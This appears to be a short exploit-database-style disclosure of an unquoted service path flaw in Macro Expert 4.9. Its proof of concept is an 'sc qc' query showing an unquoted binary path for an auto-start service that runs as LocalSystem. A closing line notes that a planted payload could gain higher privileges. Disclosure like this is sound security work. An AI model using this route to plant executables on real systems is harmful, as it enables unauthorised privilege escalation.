Macro Expert version 4.9 suffers from an unquoted service path vulnerability.
08423d6a147346b55d4780d55e7ef0bdcc86f55332bd7be42e326e1027fd4fdb
# Exploit Title: Macro Expert 4.9 - Unquoted Service Path
# Date: 04/06/2023
# Exploit Author: Murat DEMIRCI
# Vendor Homepage: http://www.macro-expert.com/
# Software Link: http://www.macro-expert.com/product/gm_setup_4.9.exe
# Version: 4.9
# Tested on: Windows 10
# Proof of Concept :
C:\Users\Murat>sc qc "Macro Expert"
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: Macro Expert
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : c:\program files (x86)\grasssoft\macro expert\MacroService.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Macro Expert
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
# If a malicious payload insert into related path and service is executed in anyway, this can gain new privilege access to the system and perform malicious acts.